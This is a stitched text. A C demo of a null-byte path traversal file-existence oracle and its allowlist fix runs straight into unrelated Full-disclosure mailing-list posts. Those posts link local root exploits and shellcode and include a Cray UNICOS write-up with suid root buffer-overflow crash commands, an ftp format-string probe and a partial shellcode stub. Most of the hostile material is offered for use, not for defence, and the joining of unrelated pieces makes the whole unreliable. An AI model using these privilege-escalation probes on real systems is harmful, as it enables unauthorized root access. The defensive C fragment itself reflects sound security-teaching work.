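const char *demo_effective_path(const char *lng_param)
{
    static char path[512];
    unsigned char lng[256];
    size_t n = url_decode(lng_param, lng, sizeof lng);
    return effective_path(lng, n, path, sizeof path);
}

/* Vulnerable flow: 1 or 0 straight from file_exists(), i.e. the two
 * distinguishable responses the post describes. */
int probe_vulnerable(const char *lng_param)
{
    const char *p = demo_effective_path(lng_param);
    return p ? fake_file_exists(p) : 0;
}

/* Hardened flow: only a short [a-z0-9_-] token may reach the filesystem;
 * NUL bytes, dots and slashes are rejected before any stat(). */
int lng_is_safe(const unsigned char *lng, size_t n)
{
    if (n == 0 || n > 16) return 0;
    for (size_t i = 0; i < n; i++)
        if (!(islower(lng[i]) || isdigit(lng[i]) || lng[i] == '_' || lng[i] == '-')) return 0;
    return 1;
}

int probe_fixed(const char *lng_param)
{
    unsigned char lng[256]; size_t n = url_decode(lng_param, lng, sizeof lng);
    return lng_is_safe(lng, n) ? probe_vulnerable(lng_param) : -1;
}
```

Without the %00 the same traversal asks about "/etc/passwd.php", which is why the null byte is what turns a harmless language selector into an existence oracle; the allowlist rejects the request before a path is ever assembled, which is cheaper and safer than trying to strip traversal sequences afterwards.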
[Full-disclosure] The Stakkato Intrusions
The Stakkato intrusions were labeled as long-standing attacks against supercomputer centres and ultimately resulted in the theft of IOS source code. A technical paper has been released by one of the affected sites detailing how they caught Stakkato.

http://www.nsc.liu.se/~nixon/stakkato.pdf

If you liked this you may also be interested in this from one of the affected supercomputer centres:

http://www.usenix.org/publications/login/2005-02/pdfs/fate.pdf
Re: [Full-disclosure] Re: Shell accounts
You have no privacy anymore, get over it.
[Full-disclosure] INFIGO-2006-03-01 exploit
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-GNU-peercast.c
Re: [Full-disclosure] iDefense Security Advisory 02.24.06: SCO Unixware Setuid ptrace Local Privilege Escalation Vulnerability
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SCO-ptrace.c
Re: [Full-disclosure] update on the linux worm
Could you clarify what vulnerabilities are being exploited in the PHP applications?

--- Gadi Evron <[EMAIL PROTECTED]> wrote:

> A quick digest of some updates from the last few hours on this issue:
>
> 1. The worm is based on 'kaiten', which has been going around in different variants for a long time now.
>
> 2. This worm is new.
>
> 3. The first part exploits PHP applications, like these variants normally do.
>
> 4. The second part spreads to other systems.
>
> 5. The worm connects to a botnet C&C based on two Fast-flux DNS RR's which are not there anymore, and as they change, are taken down.
>
> As always, more updates if necessary on:
> http://blog.securiteam.com
>
> Thanks,
>
> Gadi.
>
> --
> http://blogs.securiteam.com/
>
> "Out of the box is where I live".
> -- Cara "Starbuck" Thrace, Battlestar Galactica.
[Full-disclosure] Linux shellcodes
http://prdelka.blackart.org.uk/sh3lLc0de/prdelka-vs-LINUX-shellcode.tgz
[Full-disclosure] SUID root overflows in UNICOS and partial shellcode
Cray PVP Exploitation (Historical Hacking)
==========================================

--[ Misc CPU information

This Cray Y-MP EL with 4 CPUs and 1 GB of RAM is running UNICOS Release 9.0

[EMAIL PROTECTED] guest]$ uname -a
sn5176 sn5176 9.0.2.2 sin.0 CRAY Y-MP
[EMAIL PROTECTED] guest]$ df
/            (/dev/dsk/root):     129232 .5K blocks ( 14.7%)  25880 I-nodes
/tmp         (/dev/dsk/tmp ):    1966952 .5K blocks ( 98.3%)  62402 I-nodes
/usr         (/dev/dsk/usr ):       7016 .5K blocks (  0.5%)  22571 I-nodes
/usr/src     (/dev/dsk/src ):     429312 .5K blocks ( 44.7%)  25958 I-nodes
/adddisk1    (/dev/dsk/opt ):     704760 .5K blocks ( 58.7%)  31671 I-nodes
/proc        (/proc        ):    2007520 .5K blocks ( 97.6%)    629 procs
/onserver    (server:/disk1/exports/yel): 54180728 .5K blocks ( 70.4%)
/home        (server:/disk1/home):        54180728 .5K blocks ( 70.4%)
/var/sysinfo (server:/var/sysinfo):        7389440 .5K blocks ( 61.7%)
/secure      (server:/secure ):            7389440 .5K blocks ( 61.7%)

==[ Vulnerabilities

--[ /usr/bin/script suid root command line args buffer overflow

-rwsr-xr-x 1 root bin 73 Sep 5 1996 /usr/bin/script

[EMAIL PROTECTED] guest]$ script `perl -e 'print "A"x1000'`
Operand range error (core dumped)

--[ /etc/nu suid root file parsing buffer overflow

-rwsr-xr-x 1 root bin 1045400 Sep 4 1996 /etc/nu

[EMAIL PROTECTED] guest]$ echo "" >> /tmp/acid
[EMAIL PROTECTED] guest]$ udbgen -p /tmp
udbgen: An acid file with at least one line is required
Acid format: 'account_name:account_id'
udbgen: /tmp/group: No such file or directory
udbgen: A group file with at least one line is required
Group format: 'group_name:*:group_id:'
[EMAIL PROTECTED] guest]$ echo `perl -e 'print "A"x1'` >> /tmp/script
[EMAIL PROTECTED] guest]$ /etc/nu -p /tmp -c /tmp/script -a
admin/udb/nu/nu.c 90.709/03/96 10:43:53 (sn5176:/tmp/script)
nu: no GroupHome information in /tmp/script
Operand range error (core dumped)

-[ /bin/ftp QUOTE format string vuln (BSD ftp client bug) [non suid]

ftp> quote %08x.%08x.%08x.%08x.
500 'C001D496.253038782E253038.782E253038782E25.3038782E001B.': command not understood.
ftp> quote %n%n%n%n%n
Operand range error (core dumped)

-[ UNICOS Shellcoding CRAY PVP

The CRAY PVP does not natively support a 'syscall' instruction (unlike the new Cray X1, where the OS node provides a system call interface to the other nodes). Instead, we will use the system's standard libraries (which are linked in to most, if not all, applications). Particularly we will focus on 'libu.a', which provides the UNICOS Standard Library.

** INCOMPLETE **

[EMAIL PROTECTED] guest]$ as -f myfile.s
[EMAIL PROTECTED] guest]$ segldr -e MAIN myfile.o -lu
ldr-240 segldr: CAUTION
Entry point 'MAIN' in module 'PROG1' from file 'myfile.o' was specified on an XFER directive but is not a primary entry.
[EMAIL PROTECTED] guest]$ ./a.out
[EMAIL PROTECTED] guest]$ cat myfile.s
         IDENT   PROG1
MAIN     ENTER
         CALL    execve   ;; arguments required.
         EXIT
         END
[EMAIL PROTECTED] guest]$

--[ Documentation sites

http://oscinfo.osc.edu:8080/dynaweb/@CategoryView
http://dynaweb.tacc.utexas.edu:8080/dynaweb/@DisplayHomepage
http://www.cray.com/
[Full-disclosure] Blind port scanning with sequential TCP numbers
http://prdelka.blackart.org.uk/toOlz/mIRCDCCx

IPID-inspired take on sequential TCP source port scanning; another vector could be the use of HTML embedded frames and telnet://.
[Full-disclosure] Re: SCO Openserver 5.0.x exploit
http://seclists.org/lists/bugtraq/2006/Jan/0018.html
..
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SCO-termshx.c

Wow, I'm so popular: RoD hEDoR is the second person who wants to be ME, including an RST member copy + pasting my sudo exploit! RoD hEDoR, you forgot to mention (like in my header) that the return address in the exploit is for SCO Openserver 5.0.7.

* S U P P O R T N O N E D I S C L O S U R E *

DON'T GIVE FIREARMS TO KIDZ.
[Full-disclosure] http://prdelka.blackart.org.uk/exploitz/prdelka-vs-BSD-ptrace.tar.gz
NetBSD 2.1 & below ptrace() local root exploit.
[Full-disclosure] http://prdelka.blackart.org.uk/paperz/VAstacksmash.txt
The Linux kernel recently incorporated a protection which randomizes the stack, making exploitation of stack-based overflows more difficult. I present here an attack which works by exploiting static addresses in Linux. You should be familiar with standard stack smashing before attempting this paper. Thank you.
[Full-disclosure] prdelka.blackart.org.uk
see site.